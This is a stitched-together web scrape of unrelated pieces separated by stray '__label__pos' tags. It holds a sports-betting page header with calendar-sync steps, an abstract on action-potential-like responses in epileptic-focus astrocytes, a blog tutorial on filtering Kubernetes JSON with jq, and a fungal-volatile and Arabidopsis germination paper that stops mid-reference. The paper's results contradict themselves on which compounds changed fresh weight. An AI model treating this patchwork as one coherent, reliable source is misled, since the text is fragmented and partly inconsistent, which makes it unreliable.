正规体育投注 Menu iCal Feeds  It's recommended to sync instead of import these feeds into your calendar. How to Sync iCal Feeds with Google Calendar: 1. Right click on the applicable iCal link above and select "Copy Link Address". 2. With Google Calendar open, on the left hand side under other calendars, click on the drop down arrow. 3. Click on Add by URL. 4. Paste the iCal link into the box. 5. Click Add Calendar. 6. Once Google Calendar syncs the subscription, it will appear on the left side. 7. Locate the Calendar on the left side (it will be a long URL address), and click "calendar settings" under the URL name. 8. You can then change the name of the calendar (this is located near the top of the page). 9. Navigate out of Settings using the arrow in the top left corner. 10. You will now be able to toggle on/off the display view of this calendar and it will be listed in your calendar feed.
__label__pos
0.627594
Astrocytes from Human Hippocampal Epileptogenic Foci Exhibit Action Potential-Like Responses     loading  Checking for direct PDF access through Ovid Abstract Purpose: We studied Na+ channel expression and the ability to generate action potential (AP)-like responses in primary cultures of human astrocytes by whole cell patchclamp recording techniques. Methods: Tissue samples from 22 patients with various classifications of temporal lobe epilepsy (TLE) were plated to form separate astrocyte cultures from three regions; the hippocampus, parahippocampus, and anterolateral temporal neocortex. Results: The resting membrane potential of seizure focus astrocytes (MTLE, mesial TLE) was significantly depolarized (approximately −55 mV) as compared with cortical astrocytes (−80 mV). Hippocampal astrocytes from other substrates for TLE (MaTLE, mass-associated TLE; PTLE, paradoxical TLE) in which the hippocampus is not the seizure focus displayed resting membrane potentials similar to those of neocortical astrocytes (approximately −75 mV). Astrocytes from the seizure focus (MTLE) displayed much larger tetrodotoxin (TTX)-sensitive Na+ currents with ∼66-fold higher Na+ channel density (113.5 ± 17.41 pA/pf) than that of comparison neocortical astrocytes (1.7 ± 3.7 pA/pf) or than that of the hippocampal and parahippocampal astrocytes of the MaTLE and PTLE groups. As a consequence of this higher channel density, seizure focus astrocytes were capable of generating AP-like responses. However, at the resting potential, most Na+ channels are inactive and no spontaneous firing was observed. In contrast, astrocytes in the comparison neocortex from all groups and the hippocampus and parahippocampus from the MaTLE and PTLE groups could not fire AP-like responses even after large current injections. Conclusions: The function of Na+ channels in these astrocytes is unclear. However, the marked differences in seizure focus astrocytes as compared with cortical and nonseizure focus hippocampal astrocytes suggest a more active role for astrocytes associated with hyperexcitable neurons at a seizures focus. Related Topics     loading  Loading Related Articles
__label__pos
0.704225
DEV Community Cover image for Simplify, Process, and Analyze: The DevOps Guide to Using jq with Kubernetes Rajesh Gheware Rajesh Gheware Posted on Simplify, Process, and Analyze: The DevOps Guide to Using jq with Kubernetes By Rajesh Gheware In the ever-evolving world of software development, efficiency and clarity in managing complex systems have become paramount. Kubernetes, the de facto orchestrator for containerized applications, brings its own set of challenges, especially when dealing with the vast amounts of JSON formatted data it generates. Here, jq, a lightweight and powerful command-line JSON processor, emerges as a vital tool in a DevOps professional's arsenal. This comprehensive guide explores how to leverage jq to simplify, process, and analyze Kubernetes data, enhancing both productivity and insight. Understanding jq and Kubernetes Before diving into the integration of jq with Kubernetes, it's essential to grasp the basics. jq is a tool designed to transform, filter, map, and manipulate JSON data with ease. Kubernetes, on the other hand, manages containerized applications across a cluster of machines, producing and utilizing JSON outputs extensively through its API and command-line tools like kubectl. Why jq with Kubernetes? Kubernetes' JSON outputs can be overwhelming, making it difficult to extract necessary information quickly. jq provides a solution by allowing DevOps teams to query, modify, and streamline this data effectively. It can transform complex JSON structures into more understandable formats, extract specific data points, and even combine data from multiple sources. Getting Started with jq in Your Kubernetes Workflow Installation and Basic Operations First, ensure you have jq installed. It's available for Linux, macOS, and Windows, and can be installed via package managers like apt for Debian/Ubuntu or brew for macOS. # For Ubuntu/Debian sudo apt-get install jq # For macOS brew install jq Enter fullscreen mode Exit fullscreen mode To start, let's fetch a list of pods in a Kubernetes cluster and extract their names: kubectl get pods -o json | jq '.items[].metadata.name' Enter fullscreen mode Exit fullscreen mode This command lists all pods and pipes the JSON output to jq, which extracts the names of the pods. Filtering and Searching jq excels at filtering and searching through JSON data. For example, to find all pods running a specific image: kubectl get pods -o json | jq '.items[] | select(.spec.containers[].image == "nginx")' Enter fullscreen mode Exit fullscreen mode This snippet searches through all pods to find those running the nginx image, showcasing jq's ability to filter based on complex criteria. Transforming Data With jq, you can transform the format of your data to suit your needs. Suppose you want a simple list of pods with their statuses: kubectl get pods -o json | jq -r '.items[] | "\(.metadata.name) is \(.status.phase)"' Enter fullscreen mode Exit fullscreen mode This outputs a readable list of pod names and their statuses, demonstrating how jq can simplify Kubernetes data presentation. Advanced Data Manipulation jq is not limited to simple filters and transformations. It can handle advanced data manipulation tasks, such as aggregating statistics or modifying JSON structures. For instance, to count the number of pods in each status: kubectl get pods -o json | jq '[.items[].status.phase] | group_by(.) | .[] | {status: .[0], count: length}' Enter fullscreen mode Exit fullscreen mode This command groups pods by their status and counts them, providing a clear overview of the cluster's state. Best Practices for Using jq with Kubernetes 1. Streamline Your Queries: Start with broad queries and incrementally refine them to avoid overwhelming amounts of data. 2. Scripting with jq: Incorporate jq into scripts to automate routine data processing tasks, enhancing efficiency. 3. Maintain Readability: While jq's syntax can become complex, strive for clarity by breaking down complicated queries into understandable components. 4. Secure Your Data: When using jq to process sensitive information, ensure that data handling complies with your security policies. Conclusion Integrating jq into your Kubernetes management practices offers a pathway to not just simplification and efficiency but also deeper insights into your clusters' operations. As DevOps professionals, the ability to swiftly process and analyze JSON data allows for more informed decision-making and enhanced operational capabilities. This guide serves as a starting point. The journey with jq and Kubernetes is vast and ripe with opportunities for optimization and innovation. Embrace jq's capabilities, and let it transform how you interact with Kubernetes data, leading to more resilient, efficient, and understandable container management practices. In closing, remember that the tools are only as effective as the hands that wield them. Continual learning and experimentation with jq will undoubtedly unlock new potentials within your Kubernetes environments, marking your path as a DevOps professional with efficiency, clarity, and insight. Top comments (0)
__label__pos
0.936925
Open Access Common gas phase molecules from fungi affect seed germination and plant health in Arabidopsis thaliana • Richard Hung1Email author, • Samantha Lee1, • Cesar Rodriguez-Saona2 and • Joan W Bennett1 AMB Express20144:53 https://doi.org/10.1186/s13568-014-0053-8 Received: 21 May 2014 Accepted: 5 June 2014 Published: 15 July 2014 Abstract Fungal volatile organic compounds (VOCs) play important ecophysiological roles in mediating inter-kingdom signaling with arthropods but less is known about their interactions with plants. In this study, Arabidopsis thaliana was used as a model in order to test the physiological effects of 23 common vapor-phase fungal VOCs that included alcohols, aldehydes, ketones, and other chemical classes. After exposure to a shared atmosphere with the 23 individual VOCs for 72 hrs, seeds were assayed for rate of germination and seedling formation; vegetative plants were assayed for fresh weight and chlorophyll concentration. All but five of the VOCs tested (1-decene, 2-n-heptylfuran, nonanal, geosmin and -limonene) had a significant effect in inhibiting either germination, seedling formation or both. Seedling formation was entirely inhibited by exposure to 1-octen-3-one, 2-ethylhexanal, 3-methylbutanal, and butanal. As assayed by a combination of fresh weight and chlorophyll concentration, 2-ethylhexanal had a negative impact on two-week-old vegetative plants. Three other compounds (1-octen-3-ol, 2-ethylhexanal, and 2-heptylfuran) decreased fresh weight alone. Most of the VOCs tested did not change the fresh weight or chlorophyll concentration of vegetative plants. In summary, when tested as single compounds, fungal VOCs affected A. thaliana in positive, negative or neutral ways. Keywords Volatile organic compound Arabidopsis thaliana Fungi Seed germination Chlorophyll concentration Gas chromatography Mass spectroscopy Introduction Volatiles organic compounds (VOCs) are low molecular mass compounds with high vapor pressure and low to medium water solubility that exist in the gaseous state at room temperature (Herrmann [2010]). Approximately 250 VOCs have been identified from fungi (Chiron and Michelot [2005]) as the products of both primary and secondary metabolism (Turner and Aldridge [1983]; Korpi et al. [2009]). These gas phase molecules are emitted in complex mixtures that vary quantitatively and qualitatively depending not only on the age and genetic profiles of the producing species but also on extrinsic variables such as substrate, temperature, moisture level and pH (Sunesson et al. [1995]; Claeson et al. [2002]; Matysik et al. [2008]). Fungal volatiles have distinctive odorant properties and they have been studied extensively for their positive and negative sensory properties. They impart unique aromas and flavors to mold-ripened cheeses, Japanese koji and other mold-fermented food products (Steinkraus [1983]; Kinderlerer [1989]), and are responsible for the bouquet of gourmet mushrooms such as boletes, chanterelles and truffles (Cho et al. [2008]; Fraatz and Zorn [2010]). On the negative side, when foods are contaminated by molds, they produce off flavors. VOCs have been used as an indirect indicator of fungal spoilage in agricultural products (Borjesson et al. [1992]; Jelen and Wasowicz [1998]; Schnürer et al. [1999]) and of mold contamination in water-damaged buildings (Kuske et al. [2005]; Sahlberg et al. [2013]). Finally, because VOCs can diffuse through the atmosphere and the soil, they are well adapted for signaling between species that share a common ecological niche. Both bacterial and fungal VOCs play competitive roles in chemical interactions between microorganisms (Beattie and Torrey [1986]; Morath et al. [2012]). Many plant and microbial volatile molecules function as semiochemicals, otherwise known as “infochemicals”, and there is a large literature on the ability of fungal VOCs to mediate arthropod behavior, where they have properties as synomones, allomones, and kairomones (Rohlfs et al. [2005]; Mburu et al. [2011]; Davis et al. [2013]). The fungal VOC commonly called “mushroom alcohol” (1-octen-3-ol) is responsible for much of the musty odor associated with mold contamination and is an important insect semiochemical. It attracts many insect species, including the malaria mosquito (Takken and Knols [1999]; Thakeow et al. [2008]). In contrast, the interactions between fungal VOCs and plants have not received much scientific attention (Bitas et al. [2013]). Based on the observation that there is very little vegetation in areas known to have truffles (subterranean gourmet fungi), it has been hypothesized that these fungi may have the ability to suppress plant growth through their volatiles (Splivallo et al. [2007]). Kishimoto et al. ([2007]) have shown that 1-octen-3-ol enhances resistance of mature plants of Arabidopsis thaliana to Botrytis cinerea and activates some of the same defense genes turned on by ethylene and jasmonic acid signaling, important plant hormones involved in plant defense. We hypothesized that we could distinguish between bioactive and inactive fungal vapors by using chemical standards of individual VOCs and then exposing plants to controlled concentrations in a model habitat. We selected A. thaliana as our test species due to the many benefits associated with the use of a well recognized model system including but not limited to: small size, short life cycle, genetic tractability, and comprehensively researched background. Preliminary studies have also shown that tomato plants exposed to VOCs are affected in a similar fashion to A. thaliana exposed to the same VOCs indicating that A. thaliana is a good model organism for study. Similarly, the effects of fungal VOCs on plant development have been demonstrated in several plants in Brassicaceae family including radish, cabbage, rape, and broccoli (Ogura et al. [2000]). The aim of our study was to evaluate the effect of individual fungal VOCs on seed germination, vegetative plant growth and chlorophyll concentration in a controlled environment. In this report, our specific objectives have been to create standardized model exposure habitats in order to compare the possible stimulatory and inhibitory effects of fungal VOCs from different chemical classes (e.g., alcohols, aldehydes, ketones, and so forth) and to conduct exposure studies using A. thaliana seeds and two-week-old vegetative plants. Materials and methods Plant material and seed preparation All volatile exposure tests were done with Arabidopsis thaliana ecotype Columbia 7. Surface-sterilization of seeds and seedling formation studies were conducted as described previously with slight modifications (Hung et al. [2013]). Surface sterilized seeds were sown on Murashige and Skoog (MS) media with vitamins, 3% sucrose, and 0.3% Gellan Gum Powder (G 434 PhytoTechnology Laboratories, Shawnee Mission, KS). In germination-seedling formation studies, seeds were sown on Petri dishes (20 seeds per plate) with 20 ml MS media and placed at 4°C in the dark for three days to stratify the seeds. Seeds used to grow plants for exposure assays of two–week old plants were sown individually in test tubes with 10 ml of MS, covered with plant tissue culture caps and then stratified as described above. After three days, the stratified seeds in their individual test tubes were placed in a growth chamber at 21°C ± 2°C with a 16 hour photoperiod for two weeks prior to exposure to VOCs. Chemicals and exposure conditions Authentic standards of these high purity chemicals were purchased in liquid form from Sigma-Aldrich (St. Louis, Missouri). The criteria for the selection of these compounds were: 1) the volatiles should represent different chemical classes, 2) they had been isolated from a range of fungal species including both mushrooms and molds, and 3) that they included several VOCs commonly found in soils. The germination and vegetative exposure to VOCs were determined using the methods described previously (Hung et al. [2014]; Lee et al. [2014]). Seeds (in Petri plates) or two-week-old plants (in individual test tubes) were exposed in one liter culture vessels (see Additional file 1). All tests were done at a low concentration similar to the concentration of VOCs analyzed previously: one part per million (1 ppm = 1 μl/l). The desired concentration of 1 ppm in the test container was obtained by depositing a drop of the chemical standard (VOC) in liquid form onto the inside of the glass vessel. The compounds, due to their chemical properties will quickly volatilize into the gas phase in the test conditions. Before sealing the lids, a 10 × 10 cm piece of Dura Seal Cling Sealing Film (Diversified Biotech) was placed over the top of each culture vessel so as to prevent VOC leakage through the polypropylene closure. The culture vessels containing either seeds in Petri plates or two-week-old plants in test tubes were arranged randomly in the growth chamber and then placed on a one inch throw rotator at 40 rpm in order to volatilize and evenly distribute the compounds. The control plants were placed in identical conditions without any VOCs. Scoring germination stages The seeds were exposed to the individual VOCs for 72 hours and then examined under a binocular microscope where they were scored into three categories: no germination, germination (emergence of the radical [embryonic root]), and seedling formation (presence of the radicle, the hypocotyls and the cotyledons) (see Additional file 2). Seeds scored as “no germination” included seeds with a ruptured testa (seed coat) but without the presence of the radicle. Plant mass and chlorophyll concentration After exposure to the vapors of the individual VOCs, plants were removed from the test conditions, the shoot and leaves were cut away from the roots, and fresh weight of the shoots and leaves was obtained. The chlorophyll was extracted using the method of Jing et al. ([2002]) with some modifications. The plants were soaked overnight in 80% acetone at 4˚C in darkness prior to obtaining photometric readings at 663 and 645 nm with a spectrophotometer (DU800, Beckman Coulter, Brea, CA). Total chlorophyll = 20.2 (A645) + 8.02 (A663)(V/1,000 * w) where V = total volume of the sample, w = weight of the sample, A663 = absorbance at 663 nm, A645 = absorbance at 645 nm (Palta [1990]). Each solvent extract contained one plant per treatment. Statistical analysis The data were analyzed and plotted using Excel software (Microsoft, Redmond, WA) and SigmaPlot (SPSS Science Inc., IL). To test the significance of the exposure studies, one-way analysis of variance (ANOVA) and Student’s t-tests were performed with the aggregated data. The Student’s t-tests determine if there are significant differences between two sets of data: the control and VOC exposed plants. For germination exposures, two replicate plates with 20 seeds per plate were tested for each compound, with two independent experiments, for a total of 80 seeds. For vegetative plant exposure, four plants were placed in the exposure vessel and three jars were used for each experiment. There were three independent experiments for each compound, for a total of 36 plants. Results Seedling formation tests The percentage of seeds germinating and progressing to seedling formation after exposure to the 23 fungal volatiles is shown in Figure 1 and summarized in Figure 2. In our experiments, more than 75% of control seeds progressed to the seedling stage after 72 hrs. Similar rates of seedling formation were observed for seeds exposed to 1-decene, 2-n-heptylfuran, nonanal, geosmin and -limonene. In contrast, none of the seeds exposed to 2-ethylhexanal 1-octen-3-one, 3-methylbutanal, or butanal formed seedlings. Of these four inhibitory volatiles, radical protrusion (i.e. germination) was observed in only 19% of 1-octen-3-one exposed seeds, while 83% of seeds exposed to butanal exhibited formation of a radical. Seeds exposed to the other 14 volatile compounds tested had intermediate levels of germination efficiency and seedling formation (Figure 2). Of the five aldehydes we tested, three (2-ethylhexanal, 3-methylbutanal, or butanal) inhibited seedling formation by 100% and one (3-methylproponal) inhibited seedling formation by 70%. Nevertheless, no matter the extent of inhibition in the presence of the 23 VOCs tested, when removed from exposure to the VOCs after 72 hr, all seeds resumed germination and formed seedlings. Figure 1 Percentage of seeds that have reached each stage after 72 hrs of exposure to 23 fungal VOCs. Standard error indicated in error bars. Figure 2 A summary of the categories of percent seedling formation of A. thaliana seeds after 72 hrs of exposure to chemical standards of 23 different volatile organic compounds. Vegetative plants tests The fresh weight and chlorophyll concentration of control and exposed plants are given in Figure 3. The fresh weight of control plants was 22.4 mg (±6.7 SE). A significant decrease in fresh weight was observed after 72 hr exposure to 1-octen-3-ol, 2-ethylhexanal, and 2-heptylfuran, where the mean fresh weight was respectively 6.7 mg (±2.7 SE), 11.2 mg (±4.9 SE), and 6.3 mg (±5.4 SE) less than controls. The other compounds tested ((±)2-methyl-1-butanol, geosmin, 2-methylpropan-1-ol, 1-octen-3-ol, octan-1-ol, octan-3-ol, dec-1-ene, oct-1-ene, butanal, 2-ethylhexanal, 2-methylpropanal, 3-methylbutanal, nonanal, heptan-2-one, octan-2-one, oct-1-en-3-one, pentan-2-one, isothiocyanatocyclohexane, octanoic acid, +limonene, −limonene, and 2-heptylfuran) did not cause significant differences in fresh weight of exposed vegetative plants (Figure 3). Figure 3 Fresh weight and chlorophyll concentration of two week old plants of A. thaliana exposed for 72 hrs to chemical standards of 23 different fungal volatile organic compounds. a. Fresh weight in mg. b. Chlorophyll concentration in mg/g. Significant values compared to control are marked with an asterisk p < 0.04. Standard error indicated in error bars. In Figure 3, we have expressed the chlorophyll concentration data as mg/gm of fresh weight of shoots and leaves. Five compounds (−2-methyl-1-butanol, 1-octen-3-ol, dec-1-ene, heptan-2-one, and isothiocyanatocyclohexane) yielded statistically significant increases in chlorophyll concentration showing, respectively, 0.02 mg/g, 0.2 mg/g, 0.18 mg/g, 0.02 mg/g, and 0.4 mg/g greater amounts than controls. Three compounds, geosmin, 2-ethylhexanal, and 1-octen-3-one caused a statistically significant decrease in chlorophyll concentration of, respectively, 0.15 mg/g, 0.35 mg/g, and 0.42 mg/g less than controls. While geosmin did not adversely affect fresh weight, it did cause a significant decrease in chlorophyll concentration as indicated above. The compound 2-ethyl-hexanal decreased both fresh weight and chlorophyll concentration. The nonracemic form of −2-methyl-1-butanol showed a small but significantly different increase in both parameters. In conclusion, all but five of the VOCs tested had a significant effect in inhibiting either germination, seedling formation or both. Three of the compounds (2-ethyl-hexanal, 1-octen-3-one, and 3-methylbutanal) showed more than 50% inhibition of seed germination, while 12 of the compounds (2-methylpropan-1-ol, 2-methylpropanal, heptan-2-one, octan-2-one, isothiocyanatocyclohexane, pentan-2-one, octan-3-ol, 1-octen-3-ol, 2-ethylhexanal, 1-octen-3-one, 3-methylbutanal, and butanal) were associated with more than a 50% retardation in seedling formation. Butanal was unusual in that 83% of seeds germinated (i.e. formed a radicle) but none of these germinated seeds progressed to seedling formation. In general, the most bioactive of the VOCs we tested were aldehydes and ketones. The single, most inhibitory VOC against germination and seedling formation was oct-1-en-3-one, an eight carbon ketone that has been isolated from both molds and mushrooms (Jelen and Wasowicz [1998]). Nevertheless, in all cases, VOC exposed seeds were able to resume germination and progress to seedling stage when removed from the shared atmosphere with the VOC. We conclude that the fungal VOCs we tested have a phytostatic (inhibitory), not a phytocidal (lethal) effect on seeds. Discussion In order to study the influence of individual fungal VOCs on plant health, we used A. thaliana as our test organism and developed standardized protocols for exposing seeds and young vegetative plants. We investigated a representative sample of common fungal VOCs encompassing seven alcohols, two alkenes, five aldehydes, four ketones, and a single representative isothiocyanate, carboxylic acid, and furan. In addition, we tested both isomers of the terpene 1-methyl-4-(1-methyetenyl)-cyclohexene, commonly known as limonene. We used a 72 hour exposure period, and exposed either seeds or young vegetative plants to 1 ppm of chemical standards of the 23 fungal VOCs in a contained chamber. Seed germination assays with lettuce, cucumber and other economically important species have been widely employed as low-cost, ethically acceptable toxicity tests to screen for dangerous levels of industrial contamination in water and soils (Banks and Schultz [2005]; Wang et al. [2001]). Almost all of these assay studies have involved aqueous phase compounds, although there have been a few scattered reports describing inhibitory effect of plant volatiles on the germination of seeds from crop and weed species (Holm [1972]; Bradow and Connick [1990]). The physiological basis for this inhibitory action has not been elucidated. A. thaliana, though not agriculturally important, offers a number of experimental advantages for studying basic aspects of plant biology, including seed germination, because of its many genetic resources (Koornneef et al. [2002]). Our development of an A. thaliana exposure system for studying VOC effects under controlled conditions offers the promise of being able to use this species to dissect the germination inhibition response at the molecular level. In contrast to seed germination studies, which all report inhibition of germination by VOCs (Holm [1972]; French et al. [1975]; Bradow and Connick [1990]). To date, published studies of the effects of VOCs on vegetative plants report VOC--associated growth stimulation by mixtures of VOCs emitted by growing bacteria or fungi (Ryu et al. [2003]; Minerdi et al. [2011]; Hung et al. [2013]; Paul and Park [2013]). Many soil dwelling microbes emit VOCs that mediate various chemical “conversations” between the rhizosphere and plants (Wenke et al. [2010], [2012]). For example, plant growth promoting rhizobacteria (PGPR) produce mixtures of VOCs that enhance growth in a wide variety of species (Farag et al. [2006]; Vespermann et al. [2007]; Lugtenberg and Kamilova [2009]). In some cases, microbial VOCs induce systemic resistance (Van Loon et al. [1998]; Ryu et al. [2003]) or inhibit the growth of plant pathogens (Minerdi et al. [2009], [2011]). Volatiles of Cladosporium cladosporioides enhance growth of tobacco plants (Paul and Park [2013]) and our laboratory has shown that vegetative plants of A. thaliana seedlings grown in a shared atmosphere with volatiles emitted by living cultures of the biocontrol fungus Trichoderma viride, displayed increased size and vigor (Hung et al. [2013]). Fungal VOCs may contribute to the ability of certain species to outcompete neighboring plants. For example, the VOCs produced by Muscodor yucantanensis were toxic to the roots, and inhibited seed germination, of amaranth, tomato and barnyard grass (Macias-Rubalcava et al.[2010]). In all of these cases, the growth-enhancing effects were mediated by mixtures of naturally emitted VOCs that change with both growth phase and extrinsic environmental parameters. In our studies, we used a controlled system and exposed plants to low concentrations of individual VOCs. In this controlled habitat, the VOCs tested either had neutral or negative effects on vegetative plant growth, suggesting that the known growth enhancing effects of bacterial and fungal VOCs maybe by synergistic mixtures working in concert. A parallel example is provided by the antibiotic effects of volatiles produced by Muscodor albus. This species produces a mixture of VOCs that inhibit and kill a wide range of plant pathogenic fungi and bacteria (Strobel et al. [2001]). Nevertheless, when Muscodor VOCs were tested individually, the inhibitory effects were not observed, suggesting that the antifungal activity required a suite of VOCs working in concert (Strobel et al. [2001]). It should be recognized that studies on transkingdom signalling mediated by fungal VOCs are technically difficult to conduct. Biogenic VOCs exhibit enormous heterogeneity chemically, spatially, and temporally; are found in low concentrations; and by definition have innate evaporative properties that make it difficult to investigate their impact on plant growth and development in natural settings. Our exploratory research shows that by using controlled concentrations of pure synthetic compounds in model habitats, individual VOCs can be studied one by one, thereby isolating their distinct growth-promoting, growth-inhibiting and other physiological effects. The genetic and genomic resources available for A. thaliana make this organism well suited for future research on the mechanistic basis of VOC mediated interactions and for analysis of the consequent biological responses. In summary, the study of gas phase fungal metabolites offers many interesting prospects for enlarging our understanding of the way in which fungi interact with plants in nature and may have potential for commercial application of VOCs in greenhouse agriculture. Additional files Declarations Acknowledgements We thank Barbra Zilinskas, Chee-kok Chin, and Prakash Masurekar for their guidance and perspective. We also thank Elvira de Lange for helpful comments on an earlier draft of the manuscript. This research was supported by funds from Rutgers, The State University of New Jersey and National Science Foundation Graduate Research Fellowship under Grant No. 0937373 to SL. Authors’ Affiliations (1) Department of Plant Biology and Pathology, Rutgers, The State University of New Jersey (2) Department of Entomology, Rutgers, The State University of New Jersey References 1. Banks MK, Schultz KE: Comparison of plants for germination toxicity tests in petroleum-contaminated soils. Water Air Soil Pollut 2005, 167: 211–219.View ArticleGoogle Scholar 2. Beattie SE, Torrey GS: Toxicity of methanethiol produced by Brevibacterium linens toward Penicillium expansum . J Agr Food Sci 1986, 34: 102–104.View ArticleGoogle Scholar 3. Bitas V, Kim H-S, Bennett J, Kang S: Sniffing on microbes: diverse roles of microbial volatile organic compounds in plant health. Mol Plant Microbe Interact 2013, 26: 835–843.View ArticlePubMedGoogle Scholar 4. Borjesson T, Stollman U, Schnurer J: Volatile metabolites produced by six fungal species compared with other indicators of fungal growth on stored cereals. Appl Environ Microbiol 1992, 58: 2599–2605.PubMed CentralPubMedGoogle Scholar 5. Bradow JM, Connick WJ: Volatile seed germination inhibitors from plant residues. J Chem Ecol 1990, 16: 645–666.View ArticlePubMedGoogle Scholar 6. Chiron N, Michelot D: Odeurs de champignons: chimie et rôle dans les interactions biotiques- une revue. Cryptogam Mycol 2005, 26: 299–364.Google Scholar 7. Cho IH, Namgung H-J, Choi H-K, Kim YS: Volatiles and key odorants in the pileus and stipe of pine-mushroom ( Tricholoma matsutake Sing). Food Chem 2008, 106: 71–76.View ArticleGoogle Scholar 8. Claeson AS, Levin JO, Blomquist G, Sunesson AL: Volatile metabolites from microorganisms grown on humid building materials and synthetic media. J Environ Monit 2002, 4: 667–672.View ArticlePubMedGoogle Scholar 9. Davis TS, Crippen TL, Hofstetter RW, Tomberlin JK: Microbial volatile emissions as insect semiochemicals. J Chem Ecol 2013, 39: 840–859.View ArticlePubMedGoogle Scholar 10. Farag MA, Ryu CM, Sumner LW, Paré PA: GC-MS SPME profiling or rhizobacterial volatiles reveals prospective inducers of growth promotion and induced systemic resistance in plants. Phytochemistry 2006, 67: 2262–2268.View ArticlePubMedGoogle Scholar 11. Fraatz MA, Zorn H: Fungal Flavours. In The Mycota X: Industial Applications. 2nd edition. Edited by: Hofrichter M. Springer-Verlag, Berlin; 2010:249–264.Google Scholar 12. French RC, Gale AW, Graham CL, Latterell FM, Schmitt CG, Marchetti MA, Rines HW: Differences in germination response of spores of several species of rust and smut fungi to nonanal, 6-methyl-5-hepten-2-one, and related compounds. J Agric Food Chem 1975, 23: 766–770.View ArticlePubMedGoogle Scholar 13. Herrmann A: The chemistry and biology of volatiles. Wiley, Chichester; 2010.View ArticleGoogle Scholar 14. Holm RE: Volatile metabolites controlling germination in buried weed seeds. Plant Physiol 1972, 30: 293–297.View ArticleGoogle Scholar 15. Hung R, Lee S, Bennett JW: The effect of low concentrations of the semiochemical 1-octen-3-ol on Arabidopsis thaliana . Fungal Ecol 2013, 6: 19–26.View ArticleGoogle Scholar 16. Hung R, Lee S, Bennett JW: The effects of low concentrations of the enantiomers of mushroom alcohol (1-octen-3-ol) on Arabidopsis thaliana . Mycology: Int J Fungal Biol 2014, 5: 73–80.View ArticleGoogle Scholar 17. Jelen HH, Wasowicz E: Volatile fungal metabolites and their relation to the spoilage of agricultural commodities. Food Rev Int 1998, 14: 391–426.View ArticleGoogle Scholar 18. Jing H, Sturre MJG, Hille J, Dijkwel PP: Arabidopsis onset of leaf death mutants identify a regulatory pathway controlling leaf senescence. Plant J 2002, 32: 51–63.View ArticlePubMedGoogle Scholar 19. Kinderlerer J: Volatile metabolites of filamentous fungi and their role in food flavor. J Appl Bacteriol Symp Suppl 1989, 67: 133S-144S.View ArticleGoogle Scholar 20. Kishimoto K, Matsui K, Ozawa R, Takabayashi J: Volatile 1-octen-3-ol induces a defensive response in Arabidopsis thaliana . J Gen Plant Pathol 2007, 73: 35–37.View ArticleGoogle Scholar 21. Koornneef M, Bentsink L, Hilhorst H: Seed dormancy and germination. Curr Opin Plant Biol 2002, 5: 33–36.View ArticlePubMedGoogle Scholar 22. Korpi A, Jarnberg J, Pasanen A-L: Microbial volatile organic compounds. Crit Rev Toxicol 2009, 39: 139–193.View ArticlePubMedGoogle Scholar 23. Kuske M, Romain A-C, Nicolas J: Microbial volatile organic compounds as indicators of fungi. Can an electronic nose detect fungi in indoor environments? Build Environ 2005, 40: 824–831.View ArticleGoogle Scholar 24. Lee S, Hung R, Schink A, Mauro J, Bennett JW: Phytotoxicity of volatile organic compound. Plant Grow Reg 2014.Google Scholar 25. Lugtenberg B, Kamilova F: Plant-growth-promoting rhizobacteria. Annu Rev Microbiol 2009, 63: 541–556.View ArticlePubMedGoogle Scholar 26. Macias-Rubalcava ML, Hernandez-Bautista BE, Oropeza F, Duarte G, Gonzalez MC, Glenn AE, Hanlin RT, Anaya AL: Allelochemical effects of volatile compounds and organic extracts from Muscodor yucatanensis , a tropical endophytic fungus from Bursera simaruba . J Chem Ecol 2010, 36: 1122–1131.View ArticlePubMedGoogle Scholar 27. Matysik S, Herbarth O, Mueller A: Determination of volatile metabolites originating from mould growth on wall paper and synthetic media. J Microbiol Methods 2008, 75: 182–187.View ArticlePubMedGoogle Scholar 28. Mburu DM, Ndung’u MW, Maniania NK, Hassanali A: Comparison of volatile blends and gene sequences of two isolates of Metarhizium anisopliae of different virulence and repellency toward the termite Macrotermes michaelseni . J Exp Biol 2011, 214: 956–962.View ArticlePubMedGoogle Scholar 29. Minerdi D, Bossi S, Gullino ML, Garibaldi A: Volatile organic compounds: a potential direct long-distance mechanism for antagonistic action of Fusarium oxysporum strain MSA 35. Environ Microbiol 2009, 11: 844–854.View ArticlePubMedGoogle Scholar 30. Minerdi D, Bossi S, Maffei ME, Gullino ML, Garibaldi A: Fusarium oxysporum and its bacterial consortium promote lettuce growth and expansin A5 gene expression through microbial volatile organic compound (MVOC) emission. FEMS Microbiol Ecol 2011, 76: 342–351.View ArticlePubMedGoogle Scholar 31. Morath SU, Hung R, Bennett JW: Fungal volatile organic compounds: a review with emphasis on their biotechnological potential. Fungal Biol Rev 2012, 26: 73–83.View ArticleGoogle Scholar 32. Ogura T, Sunairi M, Nakajima M: 2-Methylisoborneol and geosmin, the main sources of soil odor, inhibit the germination of Brassicaceae seeds. Soil Sci 2000, 46: 217–227.Google Scholar 33. Palta JP: Leaf chlorophyll content. Remote Sens Rev 1990, 5: 207–213.View ArticleGoogle Scholar 34. Paul D, Park KS: Identification of volatiles produced by Cladosporium cladosporioides CL-1, a fungal biocontrol agent that promotes plant growth. Sensors 2013, 13: 13969–13977.PubMed CentralView ArticlePubMedGoogle Scholar 35. Rohlfs M, Obmann BR, Petersen R: Competition with filamentous fungi and its implication for a gregarious lifestyle in insects living on ephemeral resources. Ecol Entomol 2005, 30: 556–563.View ArticleGoogle Scholar 36. Ryu C-M, Farag MA, Hu C-H, Reddy MS, Wei H-X, Paré PW, Kloepper JW: Bacterial volatiles promote growth in Arabidopsis . Proc Natl Acad Sci U S A 2003, 100: 4927–4932.PubMed CentralView ArticlePubMedGoogle Scholar 37. Sahlberg B, Gunnbjörnsdottir M, Soonc A, Jogi R, Gislason T, Wieslander G, Janson C, Norback D: Airborne molds and bacteria, microbial volatile organic compounds (MVOC), plasticizers and formaldehyde in dwellings in three North European cities in relation to sick building syndrome (SBS). Sci Total Environ 2013, 444: 433–440.View ArticlePubMedGoogle Scholar 38. Schnürer J, Olsson J, Borjesson T: Fungal volatiles as indicators of food and feeds spoilage. Fungal Genet Biol 1999, 27: 209–217.View ArticlePubMedGoogle Scholar 39. Splivallo R, Novero M, Bertea CM, Bossi S, Bonfante P: Truffle volatiles inhibit growth and induce an oxidative burst in Arabidopsis thaliana . New Phytol 2007, 175: 17–24.View ArticleGoogle Scholar 40. Steinkraus KH: Industrial Applications of Oriental Fungal Fermentations. In The Filamentous Fungi Vol. 4 Fungal Technology. Edited by: Smith JE, Berry DR, Kristiansesn B. Edward Arnold, London; 1983:171–189.Google Scholar 41. Strobel GA, Dirkse E, Sears J, Markworth C: Volatile antimicrobials from 